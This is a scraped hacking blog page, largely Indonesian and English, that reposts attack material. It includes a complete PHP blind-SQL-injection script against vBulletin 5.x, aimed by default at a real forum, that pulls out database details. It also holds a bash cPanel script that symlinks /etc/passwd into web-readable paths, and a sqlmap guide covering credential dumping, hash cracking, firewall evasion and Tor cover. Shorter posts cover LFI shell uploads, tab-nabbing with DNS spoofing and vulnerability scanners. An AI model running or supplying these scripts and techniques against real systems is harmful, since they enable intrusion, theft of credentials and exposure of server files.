![[+]d'ZheNwaY's Blog[+]](http://feeds.feedburner.com/blogspot/YRtWp.1.gif)
<?php
/*
Author: Nytro
Powered by: Romanian Security Team
Price: Free. Educational.
*/
error_reporting(E_ALL);
ini_set('display_errors', 1);
// Get arguments
$target_url = isset($argv[1]) ? $argv[1] : 'https://rstforums.com/v5';
$expression = str_replace('/', '\\/', $target_url);
// Function to send a POST request
function httpPost($url,$params)
{
$ch = curl_init($url);
curl_setopt($ch, CURLOPT_URL,$url);
curl_setopt($ch, CURLOPT_RETURNTRANSFER,true);
curl_setopt($ch, CURLOPT_HEADER, false);
curl_setopt($ch, CURLOPT_SSL_VERIFYPEER, false);
curl_setopt($ch, CURLOPT_POST, 1);
curl_setopt($ch, CURLOPT_POSTFIELDS, $params);
curl_setopt($ch, CURLOPT_HTTPHEADER, array(
'User-Agent: Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:30.0) Gecko/20100101 Firefox/30.0',
'Accept: application/json, text/javascript, */*; q=0.01',
'X-Requested-With: XMLHttpRequest',
'Referer: https://rstforums.com/v5/memberlist',
'Accept-Language: en-US,en;q=0.5',
'Cookie: bb_lastvisit=1400483408; bb_lastactivity=0;'
));
$output = curl_exec($ch);
if($output == FALSE) print htmlspecialchars(curl_error($ch));
curl_close($ch);
return $output;
}
// Function to get string between two other strings
function get_string_between($string, $start, $end)
{
$string = " ".$string;
$ini = strpos($string,$start);
if ($ini == 0) return "";
$ini += strlen($start);
$len = strpos($string,$end,$ini) - $ini;
return substr($string,$ini,$len);
}
// Get version
print "\r\nvBulletin 5.x Remote Code Execution Exploit\r\n\r\n";
print "Version: ";
$result = httpPost($target_url . '/ajax/render/memberlist_items',
'criteria[perpage]=10&criteria[startswith]="+OR+SUBSTR(user.username,1,1)=SUBSTR(version(),1 ,1)--+"+' .
'&criteria[sortfield]=username&criteria[sortorder]=asc&securitytoken=guest');
$letter = 1;
while(strpos($result, 'No Users Matched Your Query') == false)
{
$exploded = explode('<span class=\"h-left\">\r\n\t\t\t\t\t\t\t\t\t<a href=\"' . $expression . '\/member\/', $result);
$username = get_string_between($exploded[1], '">', '<\/a>');
print $username[0];
$letter++;
$result = httpPost($target_url . '/ajax/render/memberlist_items',
'criteria[perpage]=10&criteria[startswith]="+OR+SUBSTR(user.username,1,1)=SUBSTR(version( ),' . $letter . ',1)--+"+' .
'&criteria[sortfield]=username&criteria[sortorder]=asc&securitytoken=guest');
}
// Get user
print "\r\nUser: ";
$result = httpPost($target_url . '/ajax/render/memberlist_items',
'criteria[perpage]=10&criteria[startswith]="+OR+SUBSTR(user.username,1,1)=SUBSTR(user(),1 ,1)--+"+' .
'&criteria[sortfield]=username&criteria[sortorder]=asc&securitytoken=guest');
$letter = 1;
while(strpos($result, 'No Users Matched Your Query') == false)
{
$exploded = explode('<span class=\"h-left\">\r\n\t\t\t\t\t\t\t\t\t<a href=\"' . $expression . '\/member\/', $result);
$username = get_string_between($exploded[1], '">', '<\/a>');
print $username[0];
$letter++;
$result = httpPost($target_url . '/ajax/render/memberlist_items',
'criteria[perpage]=10&criteria[startswith]="+OR+SUBSTR(user.username,1,1)=SUBSTR(user(),' . $letter . ',1)--+"+' .
'&criteria[sortfield]=username&criteria[sortorder]=asc&securitytoken=guest');
}
// Get database
print "\r\nDatabase: ";
$result = httpPost($target_url . '/ajax/render/memberlist_items',
'criteria[perpage]=10&criteria[startswith]="+OR+SUBSTR(user.username,1,1)=SUBSTR(database(), 1,1)--+"+' .
'&criteria[sortfield]=username&criteria[sortorder]=asc&securitytoken=guest');
$letter = 1;
while(strpos($result, 'No Users Matched Your Query') == false)
{
$exploded = explode('<span class=\"h-left\">\r\n\t\t\t\t\t\t\t\t\t<a href=\"' . $expression . '\/member\/', $result);
$username = get_string_between($exploded[1], '">', '<\/a>');
print $username[0];
$letter++;
$result = httpPost($target_url . '/ajax/render/memberlist_items',
'criteria[perpage]=10&criteria[startswith]="+OR+SUBSTR(user.username,1,1)=SUBSTR(database(), ' . $letter . ',1)--+"+' .
'&criteria[sortfield]=username&criteria[sortorder]=asc&securitytoken=guest');
}
print "\r\n"
?>
Sumber
Read More...
Tampilkan postingan dengan label Hacking. Tampilkan semua postingan
Tampilkan postingan dengan label Hacking. Tampilkan semua postingan
19/09/14
vBulletin 5.x Remote Code Execution Exploit
CPanel Symlink Bypasser
#!/bin/bash
# ______ __ ____ ___
# / ____/___ ____ _____ ___ / / / __ )__ ______ ____ ______________ _____ _ _< /
# / / / __ \/ __ `/ __ \/ _ \/ / / __ / / / / __ \/ __ `/ ___/ ___/ _ \/ ___/ | | / / /
# / /___/ /_/ / /_/ / / / / __/ / / /_/ / /_/ / /_/ / /_/ (__ |__ ) __/ / | |/ / /
# \____/ .___/\__,_/_/ /_/\___/_/ /_____/\__, / .___/\__,_/____/____/\___/_/ |___/_/
# /_/ /____/_/
############################################
# CPanel Symlink Bypasser [Public Version] #
# By Hannibal Ksa (@r00t3rz) & R3m0t3 Nu11 #
# alm3refh.com © Group XP 2014 #
############################################
#
# USAGE:
# 1. UPLOAD ME IN /home/user as Cpbypass.sh
# 2. GO TO CRON JOB
# 3. ADD THIS COMMAND:
# echo "Alm3refh bypass" ~| bash Cpbypass.sh -s "Alm3refh bypass" -- email@gmail.com
#
# email@gmail.com = your email
#
#
# THE FILE WILL SHOW YOU HOW TO SEE/DOWNLOAD YOUR SYMLINK!
# PS: ENJOY!
#
#
##########
# FILE #
##########
SYM="/etc/passwd"
########
echo ""
echo " ______ __ ____ ___"
echo " / ____/___ ____ _____ ___ / / / __ \)__ ______ ____ ______________ _____ _ _< /"
echo " / / / __ \/ __ \`/ __ \/ _ \/ / / __ / / / / __ \/ __ \`/ ___/ ___/ _ \/ ___/ | | / / / "
echo " / /___/ /_/ / /_/ / / / / __/ / / /_/ / /_/ / /_/ / /_/ (__ |__ ) __/ / | |/ / / "
echo " \____/ .___/\__,_/_/ /_/\___/_/ /_____/\__, / .___/\__,_/____/____/\___/_/ |___/_/ "
echo " /_/ /____/_/ "
echo " CPanel Symlink Bypasser [Public Version]"
echo " By Hannibal Ksa & R3m0t3 Nu11"
echo ""
echo ""
########
rand=bypass$(( $RANDOM % 10 + 100 ));
###
# 1st 3xpl017
###
ln -sf $SYM tmp/analog/$rand.html
echo ""
echo "1st Bypass:"
echo ""
echo "GO TO: https://yourbitch:2083/cpsession/tmp/user/analog/$rand.html"
echo "yourbitch=the cpanel url"
echo "cpsession=your cpanel session"
echo "cpsession=cpanel user"
echo ""
###
# 2nd 3xpl017
###
ln -sf $SYM tmp/webalizer/$rand.html
echo ""
echo "2nd Bypass:"
echo ""
echo "GO TO: https://yourbitch:2083/cpsession/tmp/user/webalizer/$rand.html"
echo "yourbitch=the cpanel url"
echo "cpsession=your cpanel session"
echo "cpsession=cpanel user"
echo ""
###
# 3rd 3xpl017
###
ln -sf $SYM tmp/webalizerftp/$rand.html
echo ""
echo "3rd Bypass:"
echo ""
echo "GO TO: https://yourbitch:2083/cpsession/tmp/user/webalizerftp/$rand.html"
echo "yourbitch=the cpanel url"
echo "cpsession=your cpanel session"
echo "cpsession=cpanel user"
echo ""
###
# 4th 3xpl017
###
ln -sf $SYM logs/$rand.doc
echo ""
echo "4th Bypass:"
echo ""
echo "GO TO: https://yourbitch:2083/cpsession/frontend/x3/raw/index.html"
echo "yourbitch=the cpanel url"
echo "cpsession=your cpanel session"
echo ""
echo "THEN SCROLL DOWN 'TIL YOU SEE bypass.doc AND DOWNLOAD IT!"
echo ""
# DONE of the public version!
# E0F
13/03/14
Hackers can steal Whatsapp conversations due to Android security flaw
A SECURITY VULNERABILTIY in the Android mobile operating system has been discovered that can allow cyber criminals to steal conversations from users of mobile messaging service Whatsapp.
Discovered by Bas Bosschert, the CTO of startup company Doublethink, the flaw was detailed in a blog post in which Bosschert demonstrated the method for accessing Whatsapp chats. He confirmed that the vulnerability still exists even after Google updated the Whatsapp app just last week.
The exploit is possible due to the Whatsapp database on Android being saved on the SD card, which can be read by any Android application if the user allows it to access the card.
"And since majority of the people [allow] everything on their Android device, this is not much of a problem," Bosschert said, noting that this is an issue in the Android infrastructure, specifically a problem with Android's data sandboxing system, as opposed to a security flaw in Whatsapp.
From there, a malicious app could access the Whatsapp conversation database, Bosschert said, testing his method with a companion app that he built, which uses a loading screen to distract the user while the database files are being uploaded.
Bosschert said that he can even decrypt the database with his own script despite the Whatsapp application's attempts in its recent update to encrypt the database to the point where it can't be opened by SQLite.
"We can simply decrypt this database using a simple python script," Bosschert said. "This script converts the [encrypted] database to a plain SQLite3 database.
"So, we can conclude that every application can read the Whatsapp database and it is also possible to read the chats from the encrypted databases. Facebook didn't need to buy Whatsapp to read your chats."
The full step by step guide for how he hacked Whatsapp can be found in Bosschert's blog post.
Whatsapp added privacy features and the ability to pay for a friend's subscription when it updated its Android app on Monday.
The added privacy includes controls for users to hide when they were last seen, their profile photo and their status updates from prying eyes.
While these are not groundbreaking changes, releasing a privacy update likely will appease its user following Facebook's $19bn acquisition of the company that has sparked privacy fears among Whatsapp users. These concerns are ongoing, as privacy groups called for the FTC to investigate the buyout last week, saying that it represents a threat to privacy
Read More...
10/03/14
Playing with SQL Injection and Firewall Bypassing
Playing with SQL Injection and Firewall Bypassing
Disclaimer: This article is only for educational purposes, security researchers, and pentester. I would like to clarify that I am completely against cyber-crime.
ABSTRACT
Most cyber-attacks in the world that involve websites occurs due to lack of updates and configuration faults resulting in explorations of success.
One of the main threats is SQL Injection that left many worried about their systems, programmers, and SQL databases.
The biggest problem is not the DBMS itself but the lack of definition and verification of the input fields in web applications.
CONTEXT
Many web developers do not know how SQL queries can be handled and assume that an SQL query is a trusted command. This allows for SQL queries to circumvent access controls, thereby bypassing standard authentication and authorization checks. And sometimes SQL queries even may allow access to the command shell on the server operating system level.
Direct injection of SQL commands is a technique where an attacker creates or alters existing SQL commands to expose hidden data or to override valuable data, and even to execute dangerous system level commands on the server.
INTRODUCTION
Structured Query Language is the standard declarative language for relational databases. This allows for its simplicity and ease of use.
SQL was originally developed in the early 70s at IBM labs.
SQLMAP is a tool used for this type of vulnerability.
It is Open source, and often is used for Penetration Testing that enable intrusions on fragile DBMS written in Python. It provides functions to detect and exploit vulnerabilities of SQLI. Let's use the example sqlmap.py, widely used in operating systems and databases.
STEP BY STEP
Readers I will try to explain this in the simplest possible way.
You must have a vulnerable target, to find out if the target is vulnerable just input ' at the end of the URL being tested and press "Enter" if some error is returned the database is vulnerable.
You can use google to find it with some dork. Example: inurl: news.php id = 1?
There is a bank of google dorks data and several other possibilities that can be used to filter your search.
cd /pentest/database/sqlmap
We will now begin the game, to view the menu for sqlmap.py use the command ./sqlmap.py -h
Let's run sqlmap.py, the parameter [--dbs], to search the all databases in DBMS.
Or use the parameter --current-db to show the databases that are being used.
The parameter -D is for the target of database and --tables is tables list.
We will verify the existence of interesting information in the table (admin_users), time to list the columns. The parameter is –columns.
It is important to always indicate the target database (-D) data before listing the tables because if you do not do this (without the -D) it will list all tables in all databases.
-T = target table
-C = target columns, can be more than one column to be chosen. Example: username, password.
--dump = obtain, extract data.
Important to remember the parameter --proxy: enables use of proxy.
Example: /sqlmap.py --url "http://testphp.vulnweb.com/listproducts.php?cat=1" --dbs --proxy=http://183.223.10.108:80
Readers, I think that's the basics for beginners. sqlmap.py also has many interesting functions, I suggest researching about --prefix=PREFIX, --postfix=POSTFIX and takeover options.
More information about the program and videos of them in action on the official site.
--dump is to extract the data from the site but is not given any, this must be within the selected column, and you have to choosen what to extract from the column, where I extracted the logins and passwords are saved within the column.
Generally, the field of "passwords" DBMS are encrypted.
We then need to decrypt the passwords in order to access the target system.
We can find a way to log into the system. But wait, the passwords are encrypted in MD5, hahahaha put your hash on:http://www.md5decrypt.org and may be decrypted or otherwise
BEYOND THE BASICS
Readers, lucky for us, there are some awesome tamper scripts for sqlmap, which can be found in the latest development version from the Subversion repository.
svn checkout https://svn.sqlmap.org/sqlmap/trunk/sqlmap sqlmap-dev
In fact the function of the tamper scripts is to modify the request in a way that will escape detection rules WAF (Web Application Firewall). In some cases it may be necessary to combine some tamper scripts together in order to fool the WAF. For a complete list of scripts for tampering, you may find https://svn.sqlmap.org/sqlmap/trunk/sqlmap/tamper/
Many enterprises often overlook the current vulnerabilities and rely only on the firewall for protection. Unfortunately, most, if not all firewalls can be bypassed. So gentlemen, I want to demonstrate how to use some of the new features of sqlmap to bypass WAF’s/IDS.
Well, I'll demonstrate some important scripts that are charencode.py and charcodeencode.py to work with MySQL.
Hands-on: To begin using tamper scripts, you use the --tamper followed by the script name. In the example, we use the command:
Summary of charencode.py
Quite simply, this script is useful for ignoring very weak web application firewalls (WAF) …
Another interesting function url-decode the request before processing it through their set of rules (:
The web server will anyway go to url-decoded back version, concluding, it should work against any DBMS.
Example to use:
We will demonstrate the use of charunicodeencode.py for additional security. The vast number of organizations have deployed WAF. Guys, this is a tricky part to exploit such an environment. Well, standard SQL injection attack vectors will not work neither will the scripts.
That is the reason we use tamper scripts, this facility known as “tamper scripts" in aid of a quiet way to bypass web application firewalls.
Guys, I have demonstrated just a few of the many tamper scripts. We highly recommend testing them out as each one can be used in different situations.
Notes: That's not a tool for "script kiddies" it is of utmost importance to make use of such a powerful tool responsibly and maturely.
Caution if used in the wrong way, sqlmap generates many queries and can affect the performance of the database target, moreover strange entries and changes to the database schema are possible if the tool is not controlled and used extensively.
PARTLY ANONYMOUS
I will demonstrate to you how to use sqlmap with The Onion Router for the protection of IP, DNS, etc... In your Linux, in the terminal type:
$ sudo apt-get install tor tor-geoip
After enter the sqlmap folder and type:
./sqlmap.py -u "http://www.targetvuln.com/index.php?cata_id=1" -b -a –tor --check-tor--user-agent="Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"
The argument --tor invokes the Tor to be used and the --check-tor checks if Tor is being used properly, if not, you will receive an error message in red at the terminal. The User Agent is the googlebot, all your requests on the site will look like the Google bot doing a little visit.
TOR at SQLMap, we can set your TOR proxy for hiding the source from where the traffic or request is generated.
–tor-port, –tor-type : the parameter can help you out to set the TOR proxy manually.
–check-tor : the parameter will check if the tor setup is appropriate and functional.
CONCLUSION:
It is known that many targets have been explored through SQL Injection a few years ago when this threat was discovered, the injection form was "the nail". The pentester had to enter the codes manually, taking longer to complete the attack.
Then came the development of programs that automated attack. Nowadays perhaps the best known of these programs is sqlmap.py. SQLMAP is a program of open source testing framework written in Python. It has full support for database systems: MySQL, Oracle, PostgreSQL, Microsoft SQL Server, Microsoft Access, IBM DB2, SQLite, Firebird, Sybase, SAP MaxDB and also supports 6 types of SQL Injection techniques.
SOLUTION:
1. Correct the SQL server regularly.
2. Limit the use of dynamic queries.
3. Escape input data from users.
4. Stores the credentials of the database in a separate file.
5. Use the principle of least privilege.
6. Turn off the magic quotes.
7. Disable shell access.
8. Disable any feature of the bank that you do not need
9. Test your code
10. Search in google advanced techniques to correct this vulnerability.
26/09/12
Fimap Tool - Local And Remote File Inclusion With Backbox Linux
Description: LFI ATTACK WITH FIMAP, target DVWA, arm BACKBOX LINUX.
First you need to install DVWA*, then run Apache server (comes with BackBox Linux), then read how to use FIMAP (terminal fimap -h), one c99 shell script (to find one type inurl:c99.txt in Google search box).You will need to set Apache directory permissions, for this you can use this bash script : http://www.linux.re.rs/files/scripts/dirbash.sh. I will show you how to upload shell to vulnerable server and exploit the vulnerability.
* How to install DVWA with BackBox Linux !
http://www.anonimus.re.rs/6562
Author : Nenad Marjanovic
IT nick : ZEROF
Author site : http://www.pentester.iz.rs
Read More...
First you need to install DVWA*, then run Apache server (comes with BackBox Linux), then read how to use FIMAP (terminal fimap -h), one c99 shell script (to find one type inurl:c99.txt in Google search box).You will need to set Apache directory permissions, for this you can use this bash script : http://www.linux.re.rs/files/scripts/dirbash.sh. I will show you how to upload shell to vulnerable server and exploit the vulnerability.
* How to install DVWA with BackBox Linux !
http://www.anonimus.re.rs/6562
Author : Nenad Marjanovic
IT nick : ZEROF
Author site : http://www.pentester.iz.rs
25/09/12
Urlcrazy Tool On Backtrack 5 R3
Description: URLCrazy is a tool that can generate and test domain
typos and variations to detect and perform typo squatting, URL
hijacking, phishing, and corporate espionage. It generates 15 types of
domain variants, knows over 8000 common misspellings, supports multiple
keyboard layouts, can check if a typo is a valid domain, tests if domain
typos are in use, and estimates the popularity of a typo.
Vega Web Scanner On Backtrack 5 R3
Description: Vega is an open source platform to test the security
of web applications. Vega can help you find and validate SQL
Injections, Cross-Site Scripting (XSS), inadvertently disclosed
sensitive information, and other vulnerabilities. It is written in Java,
GUI based, and runs on Linux, OS X, and Windows.
Read More...
23/09/12
Tab-Nabbing With Dns Spoofing Using Backtrack
Description: In this Tutorial I have Explained how to use SET (
Social Engineering tool kit) for Tab nabbing and DNS Spoofing using
Ettercap to make it more effective in LAN.......
In next tutorial I will Explain How to do it using port 443 of attacker machine instead of using port 80. So that even if victim type https://url instead of http then also he/she get attacked.
In next tutorial I will Explain How to do it using port 443 of attacker machine instead of using port 80. So that even if victim type https://url instead of http then also he/she get attacked.
Proxy Checker
Assalamu'alaikum Wr Wb
sesuai dengan judulnya,,ane yakin kalian semua tau gmn ending cerita
CEKIDOT !!!
1. Download dulu tool proxy checkernya Proxy Checker
2. Punya list proxy yang mau di cek,, kalau males ngumpulin
nie ane sudah sediain beberapa list proxy yang ane dapet dari segala sumber terpercaya
Download disini ea Gays List Proxy
3. Setelah 2 hal diatas siap,,selanjutnya kita coba jalanin tool checkernya
ketika ada tulisan "Enter Your Proxy Lists" isi aja nama folder proxy list ente
dan selanjutnya bisa di isi sesuai dengan gambar dibawah ini
4. Setelah itu maka kita tinggal tunggu hasilnya aja gays
5. Ketika aksi checkernya sudah selesai,, saatnya kita tes satu-persatu dari hasil checker proxy tersebut. Hasilnya sudah automatis berbentuk .txt dengan nama file works.txt
mungkin sekian dulu acara berbagi
semoga bermanfaat untuk kita semua
akhirnya kata, Wassalamu'alaikum Wr Wb
Sumber
Read More...
20/11/11
Tutorial Wordpress Scanning
Assalamu'alaikum dan salam sejahtera buat kita semua
ketemu agy ma ane yg newbie nie 
kali ini ane akan memberikan sedikit tutor mengenai Scanning Wordpress dan
tanpa banyak bacot langsung ke topic utamanya ea
CEKIDOT !!!
1. Download software wordpress scanner disini wp-scan
==============================================================
-=- kita akan menjalankan wordpress scanner
setelah di download,, extract dulu file tersebut
buka terminal dan ketikkan command berikut ini :
cd Downloads
cd WP-SCAN
perl wp-scan.pl target.com
ex : perl wp-scan.pl www.webhostingiix.com
setelah proses scan selesai,,kalian bisa melihat hasilnya(proses nya ga nampak disana)
ntar ada report kalo udh finished, bisa dilihat hasilnya di sqli-bugs.txt di folder wp-scan tadi
selanjutnya kalian bisa melakukan penginjectkan terhadap target
===========================================================================
silahkan tunggu sampai selesai dari proses scanning
nantinya disana akan tertera mana saja yang vuln
setelah selesai semuanya,,kita tinggal nyari exploitnya saudara-saudara 
untuk nyari exploitnya bisa cari dimana saja
sekian dulu tutor cupu dari ane 
semoga bermanfaat buat kita semua 
akhir kata dari ane, wassalam
nb : vba & ArRay
Read More...
![[Image: Screenshot-7.png]](http://i842.photobucket.com/albums/zz349/dzhenway/Screenshot-7.png)
![[Image: Screenshot-1-1.png]](http://i842.photobucket.com/albums/zz349/dzhenway/Screenshot-1-1.png)
Tutorial Joomla Web Scanner 1.7
Assalamu'alaikum dan salam sejahtera buat kita semua 
sudah lama tidak update blog
oke langsung saja,,kali ini ane akan memberikan sedikit maenan buat tmen2 semua
sesuai dengan judulnya "Joomla Web Scanner 1.7"
dengan melihat judulnya saja,pasti temen-temen sudah pada ngerti tools ini buat apa
CEKIDOT !!!
1. download dulu toolsnya Joomla-Scan
2. setelah di download mari kita extract file tersebut
3. kemudian kita akan menjalankan proses scanning target
pertama-tama kita lihat dulu command untuk tool ini
ketikkan = ./joomlascan/pl help
nantinya akan keluar seperti ini
![[Image: joomla1.png]](http://i842.photobucket.com/albums/zz349/dzhenway/joomla1.png)
Usage: ./joomlascan.pl -u <joomla_url> [options]
== Options ==
-p <string:int> = proxy:port
-a = Admin folder (default '/administration')
-v = Check version
-c = Check components
-f = Check firewall
-co = Check bugs in core (require -v)
-cm = Check bugs in components (require -c)
-all = Check all (default)
-ot = Output to text file
-oh = Output to html file
-update = Search for updates
-force-update = Force to download updates
-about = About joomlascan
-version = Print version info
-h, -help = This help
== Examples ==
To scan running joomla version and components:
$./joomlascan.pl -u www.host.com -v -c
To scan version and core bugs:
$./joomlascan.pl -u www.host.com -v -co
4. saatnya beraksi dengan mengetik command berikut ini
./joomlascan.pl -u www.target.com -v -co
tunggu sampai selesai proses scanning,,ngerokok dulu mas bro
setelah selesai akan seperti ini hasilnya
mungkin segitu dulu tutor cupu dari ane
semoga bermanfaat bagi kita semua
akhir kata dari ane,,wassalam
Read More...
![[Image: joomla-vuln.png]](http://i842.photobucket.com/albums/zz349/dzhenway/joomla-vuln.png)
Langganan:
Postingan (Atom)